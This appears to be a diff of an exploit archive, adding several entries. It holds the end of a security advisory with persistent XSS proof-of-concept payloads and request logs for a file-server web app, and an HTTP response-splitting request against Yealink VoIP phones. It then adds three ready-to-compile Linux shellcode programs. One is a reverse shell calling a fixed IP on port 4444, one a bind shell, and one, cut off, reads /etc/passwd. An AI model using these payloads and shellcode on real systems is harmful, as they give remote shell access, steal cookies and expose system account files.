<a href="/" class="HierarchyText"><b>ktest2 "><[COMMAND INJECT VULNERABILITY!]"></b></a> >
|
||||
<span id="hierarchy"></span>
|
||||
</div>
|
||||
<div id="title" class="Title" style="padding-top:8px;padding-bottom:30px;">Files</div>
|
||||
</td>
|
||||
<td width=200 align=right valign=top>
|
||||
<div id="signOutButtonArea" style="padding-top:20px;">
|
||||
<span onclick="signOut();" style="cursor:pointer;">Sign Out</span>
|
||||
</div>
|
||||
</td>
|
||||
<td width=65> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
--- PoC Session Logs [GET]---
|
||||
GET http://localhost:8080/Files/ Load Flags[LOAD_FROM_CACHE VALIDATE_NEVER LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[unbekannt]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
The persistent input validation web vulnerabilities can be exploited by remote attackers without local privileged web-application user account and with low or medium user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: NewTextFile
|
||||
<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
|
||||
<div style="padding-top:5px;"><img src="/Resources/img/folder-icon.png"></div></td><td valign="top"><div><a target="_self"
|
||||
class="DirectoryListingLink" href=""><iframe src="a" onload="alert("PENTEST")" <"="[PERSISTENT INEJCTED SCRIPT CODE!]">"><iframe src=a onload=alert("PENTEST") <</a></div>
|
||||
<div style="padding-top:5px;"><span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div>
|
||||
|
||||
|
||||
PoC: NewTextFile
|
||||
PoC: Folder
|
||||
<td valign="top"><div><a target="_self" class="DirectoryListingLink" href="<h>xxs link
|
||||
<a>[PERSISTENT INEJCTED SCRIPT CODE!]<img src=" c"="" onerror="alert(document.domain)">"><h>xxs link</h></a><a><img src="c" onerror="alert(document.cookie)"></a></div>
|
||||
<div style="padding-top:5px;"><span class="SmallTextButton" onclick="renameItem(0);">Rename</span></div></td>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST]---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[345] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Content-Type[text/html]
|
||||
Content-Length[345]
|
||||
Date[Mon, 25 Jan 2016 09:54:49 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/NewTextFile Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[56]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
|
||||
Response Header:
|
||||
Content-Length[2]
|
||||
Date[Mon, 25 Jan 2016 09:54:55 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[9636] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[9636]
|
||||
Date[Mon, 25 Jan 2016 09:54:55 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/CreateFolder Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[56]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
path[%22%3E%3Cimg%3E%2520%22%3C[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]%20src%3D%22c%22%3E]
|
||||
Response Header:
|
||||
Content-Length[23]
|
||||
Date[Mon, 25 Jan 2016 09:55:00 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/c[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[345] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Type[text/html]
|
||||
Content-Length[345]
|
||||
Date[Mon, 25 Jan 2016 09:55:02 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
1.1
|
||||
The arbitrary file upload vulnerability can be patched by a secure parse and validation of the filename value in the upload POST method request.
|
||||
Restrict the input and disallow special chars or script code tags to prevent an attack. Disallow usage of multiple file extensions and approve them as well.
|
||||
|
||||
1.2
|
||||
The local command inject vulnerability can be patched by a secure parse and encode of the header location in the file dir listing index, were the devicename is displayed.
|
||||
|
||||
1.3
|
||||
The persistent input validation web vulnerability can be patched by a secure encode and parse of the `path` and `name (class)` values in
|
||||
the `NewTextFile` or `New Folder` modules. Disallow usage of special chars on input to prevent persistent script code injection attacks.
|
||||
Encode the index output values to prevent the execution point of the issue.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
1.1
|
||||
The security risk of the arbitrary file upload web vulnerability in the filename value on upload is estimated as high. (CVSS 7.3)
|
||||
|
||||
1.2
|
||||
The local command inject web vulnerability in the device name value is estimated as medium. (CVSS 6.1)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
9
platforms/java/webapps/39334.txt
Executable file
9
platforms/java/webapps/39334.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68022/info
|
||||
|
||||
Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
|
||||
|
||||
Yealink VoIP Phones firmware 28.72.0.2 and hardware 28.2.0.128.0.0.0 are vulnerable; other versions may also be affected.
|
||||
|
||||
GET /servlet?linepage=1&model=%0d%0a[Header]&p=dsskey&q=load
|
134
platforms/linux/shellcode/39336.c
Executable file
134
platforms/linux/shellcode/39336.c
Executable file
|
@ -0,0 +1,134 @@
|
|||
/*
|
||||
[+] Author : B3mB4m
|
||||
[~] Contact : b3mb4m@protonmail.com
|
||||
[~] Project : https://github.com/b3mb4m/Shellsploit
|
||||
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
||||
|
||||
|
||||
#If you want test it, you must compile it within x86 OS.
|
||||
#Or basically you can get it with shellsploit.
|
||||
#Default setthings for port:4444 host:192.168.1.29
|
||||
|
||||
00000000 31C0 xor eax,eax
|
||||
00000002 40 inc eax
|
||||
00000003 7448 jz 0x4d
|
||||
00000005 6A66 push byte +0x66
|
||||
00000007 58 pop eax
|
||||
00000008 99 cdq
|
||||
00000009 52 push edx
|
||||
0000000A 42 inc edx
|
||||
0000000B 52 push edx
|
||||
0000000C 89D3 mov ebx,edx
|
||||
0000000E 42 inc edx
|
||||
0000000F 52 push edx
|
||||
00000010 89E1 mov ecx,esp
|
||||
00000012 CD80 int 0x80
|
||||
00000014 93 xchg eax,ebx
|
||||
00000015 89D1 mov ecx,edx
|
||||
00000017 B03F mov al,0x3f
|
||||
00000019 CD80 int 0x80
|
||||
0000001B 49 dec ecx
|
||||
0000001C 79F9 jns 0x17
|
||||
0000001E B066 mov al,0x66
|
||||
00000020 87DA xchg ebx,edx
|
||||
00000022 68C0A8011D push dword 0x1d01a8c0
|
||||
00000027 6668115C push word 0x5c11
|
||||
0000002B 6653 push bx
|
||||
0000002D 43 inc ebx
|
||||
0000002E 89E1 mov ecx,esp
|
||||
00000030 6A10 push byte +0x10
|
||||
00000032 51 push ecx
|
||||
00000033 52 push edx
|
||||
00000034 89E1 mov ecx,esp
|
||||
00000036 CD80 int 0x80
|
||||
00000038 6A0B push byte +0xb
|
||||
0000003A 58 pop eax
|
||||
0000003B 99 cdq
|
||||
0000003C 89D1 mov ecx,edx
|
||||
0000003E 52 push edx
|
||||
0000003F 682F2F7368 push dword 0x68732f2f
|
||||
00000044 682F62696E push dword 0x6e69622f
|
||||
00000049 89E3 mov ebx,esp
|
||||
0000004B CD80 int 0x80
|
||||
0000004D 48 dec eax
|
||||
0000004E 31C0 xor eax,eax
|
||||
00000050 48 dec eax
|
||||
00000051 31FF xor edi,edi
|
||||
00000053 48 dec eax
|
||||
00000054 31F6 xor esi,esi
|
||||
00000056 48 dec eax
|
||||
00000057 31D2 xor edx,edx
|
||||
00000059 4D dec ebp
|
||||
0000005A 31C0 xor eax,eax
|
||||
0000005C 6A02 push byte +0x2
|
||||
0000005E 5F pop edi
|
||||
0000005F 6A01 push byte +0x1
|
||||
00000061 5E pop esi
|
||||
00000062 6A06 push byte +0x6
|
||||
00000064 5A pop edx
|
||||
00000065 6A29 push byte +0x29
|
||||
00000067 58 pop eax
|
||||
00000068 0F05 syscall
|
||||
0000006A 49 dec ecx
|
||||
0000006B 89C0 mov eax,eax
|
||||
0000006D 48 dec eax
|
||||
0000006E 31F6 xor esi,esi
|
||||
00000070 4D dec ebp
|
||||
00000071 31D2 xor edx,edx
|
||||
00000073 41 inc ecx
|
||||
00000074 52 push edx
|
||||
00000075 C6042402 mov byte [esp],0x2
|
||||
00000079 66C7442402115C mov word [esp+0x2],0x5c11
|
||||
00000080 C7442404C0A8011D mov dword [esp+0x4],0x1d01a8c0
|
||||
00000088 48 dec eax
|
||||
00000089 89E6 mov esi,esp
|
||||
0000008B 6A10 push byte +0x10
|
||||
0000008D 5A pop edx
|
||||
0000008E 41 inc ecx
|
||||
0000008F 50 push eax
|
||||
00000090 5F pop edi
|
||||
00000091 6A2A push byte +0x2a
|
||||
00000093 58 pop eax
|
||||
00000094 0F05 syscall
|
||||
00000096 48 dec eax
|
||||
00000097 31F6 xor esi,esi
|
||||
00000099 6A03 push byte +0x3
|
||||
0000009B 5E pop esi
|
||||
0000009C 48 dec eax
|
||||
0000009D FFCE dec esi
|
||||
0000009F 6A21 push byte +0x21
|
||||
000000A1 58 pop eax
|
||||
000000A2 0F05 syscall
|
||||
000000A4 75F6 jnz 0x9c
|
||||
000000A6 48 dec eax
|
||||
000000A7 31FF xor edi,edi
|
||||
000000A9 57 push edi
|
||||
000000AA 57 push edi
|
||||
000000AB 5E pop esi
|
||||
000000AC 5A pop edx
|
||||
000000AD 48 dec eax
|
||||
000000AE BF2F2F6269 mov edi,0x69622f2f
|
||||
000000B3 6E outsb
|
||||
000000B4 2F das
|
||||
000000B5 7368 jnc 0x11f
|
||||
000000B7 48 dec eax
|
||||
000000B8 C1EF08 shr edi,byte 0x8
|
||||
000000BB 57 push edi
|
||||
000000BC 54 push esp
|
||||
000000BD 5F pop edi
|
||||
000000BE 6A3B push byte +0x3b
|
||||
000000C0 58 pop eax
|
||||
000000C1 0F05 syscall
|
||||
*/
|
||||
|
||||
//Project : https://github.com/b3mb4m/Shellsploit
|
||||
//This file created with shellsploit ..
|
||||
//19/01/2016 - 00:39:58
|
||||
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x40\x74\x48\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68\xc0\xa8\x01\x1d\x66\x68\x11\x5c\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x1d\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
|
||||
|
||||
int main(void){
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
179
platforms/linux/shellcode/39337.c
Executable file
179
platforms/linux/shellcode/39337.c
Executable file
|
@ -0,0 +1,179 @@
|
|||
/*
|
||||
[+] Author : B3mB4m
|
||||
[~] Contact : b3mb4m@protonmail.com
|
||||
[~] Project : https://github.com/b3mb4m/Shellsploit
|
||||
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
||||
|
||||
|
||||
#If you want test it, you must compile it within x86 OS.
|
||||
#Or basically you can get it with shellsploit.
|
||||
#Default setthings for port:4444
|
||||
|
||||
|
||||
00000000 31C0 xor eax,eax
|
||||
00000002 40 inc eax
|
||||
00000003 7460 jz 0x65
|
||||
00000005 31DB xor ebx,ebx
|
||||
00000007 F7E3 mul ebx
|
||||
00000009 B066 mov al,0x66
|
||||
0000000B B301 mov bl,0x1
|
||||
0000000D 52 push edx
|
||||
0000000E 53 push ebx
|
||||
0000000F 6A02 push byte +0x2
|
||||
00000011 89E1 mov ecx,esp
|
||||
00000013 CD80 int 0x80
|
||||
00000015 89C6 mov esi,eax
|
||||
00000017 B066 mov al,0x66
|
||||
00000019 43 inc ebx
|
||||
0000001A 52 push edx
|
||||
0000001B 6668115C push word 0x5c11
|
||||
0000001F 6653 push bx
|
||||
00000021 89E1 mov ecx,esp
|
||||
00000023 6A10 push byte +0x10
|
||||
00000025 51 push ecx
|
||||
00000026 56 push esi
|
||||
00000027 89E1 mov ecx,esp
|
||||
00000029 CD80 int 0x80
|
||||
0000002B B066 mov al,0x66
|
||||
0000002D B304 mov bl,0x4
|
||||
0000002F 52 push edx
|
||||
00000030 56 push esi
|
||||
00000031 89E1 mov ecx,esp
|
||||
00000033 CD80 int 0x80
|
||||
00000035 B066 mov al,0x66
|
||||
00000037 B305 mov bl,0x5
|
||||
00000039 52 push edx
|
||||
0000003A 52 push edx
|
||||
0000003B 56 push esi
|
||||
0000003C 89E1 mov ecx,esp
|
||||
0000003E CD80 int 0x80
|
||||
00000040 93 xchg eax,ebx
|
||||
00000041 31C9 xor ecx,ecx
|
||||
00000043 B102 mov cl,0x2
|
||||
00000045 B03F mov al,0x3f
|
||||
00000047 CD80 int 0x80
|
||||
00000049 49 dec ecx
|
||||
0000004A 79F9 jns 0x45
|
||||
0000004C 92 xchg eax,edx
|
||||
0000004D 50 push eax
|
||||
0000004E 682F2F7368 push dword 0x68732f2f
|
||||
00000053 682F62696E push dword 0x6e69622f
|
||||
00000058 89E3 mov ebx,esp
|
||||
0000005A 50 push eax
|
||||
0000005B 53 push ebx
|
||||
0000005C 89E1 mov ecx,esp
|
||||
0000005E 50 push eax
|
||||
0000005F 89E2 mov edx,esp
|
||||
00000061 B00B mov al,0xb
|
||||
00000063 CD80 int 0x80
|
||||
00000065 48 dec eax
|
||||
00000066 31C0 xor eax,eax
|
||||
00000068 48 dec eax
|
||||
00000069 31FF xor edi,edi
|
||||
0000006B 48 dec eax
|
||||
0000006C 31F6 xor esi,esi
|
||||
0000006E 48 dec eax
|
||||
0000006F 31D2 xor edx,edx
|
||||
00000071 4D dec ebp
|
||||
00000072 31C0 xor eax,eax
|
||||
00000074 6A02 push byte +0x2
|
||||
00000076 5F pop edi
|
||||
00000077 6A01 push byte +0x1
|
||||
00000079 5E pop esi
|
||||
0000007A 6A06 push byte +0x6
|
||||
0000007C 5A pop edx
|
||||
0000007D 6A29 push byte +0x29
|
||||
0000007F 58 pop eax
|
||||
00000080 0F05 syscall
|
||||
00000082 49 dec ecx
|
||||
00000083 89C0 mov eax,eax
|
||||
00000085 4D dec ebp
|
||||
00000086 31D2 xor edx,edx
|
||||
00000088 41 inc ecx
|
||||
00000089 52 push edx
|
||||
0000008A 41 inc ecx
|
||||
0000008B 52 push edx
|
||||
0000008C C6042402 mov byte [esp],0x2
|
||||
00000090 66C7442402115C mov word [esp+0x2],0x5c11
|
||||
00000097 48 dec eax
|
||||
00000098 89E6 mov esi,esp
|
||||
0000009A 41 inc ecx
|
||||
0000009B 50 push eax
|
||||
0000009C 5F pop edi
|
||||
0000009D 6A10 push byte +0x10
|
||||
0000009F 5A pop edx
|
||||
000000A0 6A31 push byte +0x31
|
||||
000000A2 58 pop eax
|
||||
000000A3 0F05 syscall
|
||||
000000A5 41 inc ecx
|
||||
000000A6 50 push eax
|
||||
000000A7 5F pop edi
|
||||
000000A8 6A01 push byte +0x1
|
||||
000000AA 5E pop esi
|
||||
000000AB 6A32 push byte +0x32
|
||||
000000AD 58 pop eax
|
||||
000000AE 0F05 syscall
|
||||
000000B0 48 dec eax
|
||||
000000B1 89E6 mov esi,esp
|
||||
000000B3 48 dec eax
|
||||
000000B4 31C9 xor ecx,ecx
|
||||
000000B6 B110 mov cl,0x10
|
||||
000000B8 51 push ecx
|
||||
000000B9 48 dec eax
|
||||
000000BA 89E2 mov edx,esp
|
||||
000000BC 41 inc ecx
|
||||
000000BD 50 push eax
|
||||
000000BE 5F pop edi
|
||||
000000BF 6A2B push byte +0x2b
|
||||
000000C1 58 pop eax
|
||||
000000C2 0F05 syscall
|
||||
000000C4 59 pop ecx
|
||||
000000C5 4D dec ebp
|
||||
000000C6 31C9 xor ecx,ecx
|
||||
000000C8 49 dec ecx
|
||||
000000C9 89C1 mov ecx,eax
|
||||
000000CB 4C dec esp
|
||||
000000CC 89CF mov edi,ecx
|
||||
000000CE 48 dec eax
|
||||
000000CF 31F6 xor esi,esi
|
||||
000000D1 6A03 push byte +0x3
|
||||
000000D3 5E pop esi
|
||||
000000D4 48 dec eax
|
||||
000000D5 FFCE dec esi
|
||||
000000D7 6A21 push byte +0x21
|
||||
000000D9 58 pop eax
|
||||
000000DA 0F05 syscall
|
||||
000000DC 75F6 jnz 0xd4
|
||||
000000DE 48 dec eax
|
||||
000000DF 31FF xor edi,edi
|
||||
000000E1 57 push edi
|
||||
000000E2 57 push edi
|
||||
000000E3 5E pop esi
|
||||
000000E4 5A pop edx
|
||||
000000E5 48 dec eax
|
||||
000000E6 BF2F2F6269 mov edi,0x69622f2f
|
||||
000000EB 6E outsb
|
||||
000000EC 2F das
|
||||
000000ED 7368 jnc 0x157
|
||||
000000EF 48 dec eax
|
||||
000000F0 C1EF08 shr edi,byte 0x8
|
||||
000000F3 57 push edi
|
||||
000000F4 54 push esp
|
||||
000000F5 5F pop edi
|
||||
000000F6 6A3B push byte +0x3b
|
||||
000000F8 58 pop eax
|
||||
000000F9 0F05 syscall
|
||||
*/
|
||||
|
||||
|
||||
//Project : https://github.com/b3mb4m/Shellsploit
|
||||
//This file created with shellsploit ..
|
||||
//19/01/2016 - 00:36:45
|
||||
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x40\x74\x60\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
|
||||
|
||||
int main(void){
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
102
platforms/linux/shellcode/39338.c
Executable file
102
platforms/linux/shellcode/39338.c
Executable file
|
@ -0,0 +1,102 @@
|
|||
/*
|
||||
[+] Author : B3mB4m
|
||||
[~] Contact : b3mb4m@protonmail.com
|
||||
[~] Project : https://github.com/b3mb4m/Shellsploit
|
||||
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
||||
|
||||
|
||||
|
||||
#If you want test it, you must compile it within x86 OS.
|
||||
#Or basically you can get it with shellsploit.
|
||||
#Default setthings for /etc/passwd
|
||||
|
||||
|
||||
00000000 31C0 xor eax,eax
|
||||
00000002 40 inc eax
|
||||
00000003 743A jz 0x3f
|
||||
00000005 31C9 xor ecx,ecx
|
||||
00000007 31C0 xor eax,eax
|
||||
00000009 31D2 xor edx,edx
|
||||
0000000B 51 push ecx
|
||||
0000000C B005 mov al,0x5
|
||||
0000000E 6873737764 push dword 0x64777373
|
||||
00000013 68632F7061 push dword 0x61702f63
|
||||
00000018 682F2F6574 push dword 0x74652f2f
|
||||
0000001D 89E3 mov ebx,esp
|
||||
0000001F CD80 int 0x80
|
||||
00000021 89D9 mov ecx,ebx
|
||||
00000023 89C3 mov ebx,eax
|
||||
00000025 B003 mov al,0x3
|
||||
00000027 66BAFF0F mov dx,0xfff
|
||||
0000002B 6642 inc dx
|
||||
0000002D CD80 int 0x80
|
||||
0000002F 31C0 xor eax,eax
|
||||
00000031 31DB xor ebx,ebx
|
||||
00000033 B301 mov bl,0x1
|
||||
00000035 B004 mov al,0x4
|
||||
00000037 CD80 int 0x80
|
||||
00000039 31C0 xor eax,eax
|
||||
0000003B B001 mov al,0x1
|
||||
0000003D CD80 int 0x80
|
||||
0000003F EB3F jmp short 0x80
|
||||
00000041 5F pop edi
|
||||
00000042 80770B41 xor byte [edi+0xb],0x41
|
||||
00000046 48 dec eax
|
||||
00000047 31C0 xor eax,eax
|
||||
00000049 0402 add al,0x2
|
||||
0000004B 48 dec eax
|
||||
0000004C 31F6 xor esi,esi
|
||||
0000004E 0F05 syscall
|
||||
00000050 6681ECFF0F sub sp,0xfff
|
||||
00000055 48 dec eax
|
||||
00000056 8D3424 lea esi,[esp]
|
||||
00000059 48 dec eax
|
||||
0000005A 89C7 mov edi,eax
|
||||
0000005C 48 dec eax
|
||||
0000005D 31D2 xor edx,edx
|
||||
0000005F 66BAFF0F mov dx,0xfff
|
||||
00000063 48 dec eax
|
||||
00000064 31C0 xor eax,eax
|
||||
00000066 0F05 syscall
|
||||
00000068 48 dec eax
|
||||
00000069 31FF xor edi,edi
|
||||
0000006B 40 inc eax
|
||||
0000006C 80C701 add bh,0x1
|
||||
0000006F 48 dec eax
|
||||
00000070 89C2 mov edx,eax
|
||||
00000072 48 dec eax
|
||||
00000073 31C0 xor eax,eax
|
||||
00000075 0401 add al,0x1
|
||||
00000077 0F05 syscall
|
||||
00000079 48 dec eax
|
||||
0000007A 31C0 xor eax,eax
|
||||
0000007C 043C add al,0x3c
|
||||
0000007E 0F05 syscall
|
||||
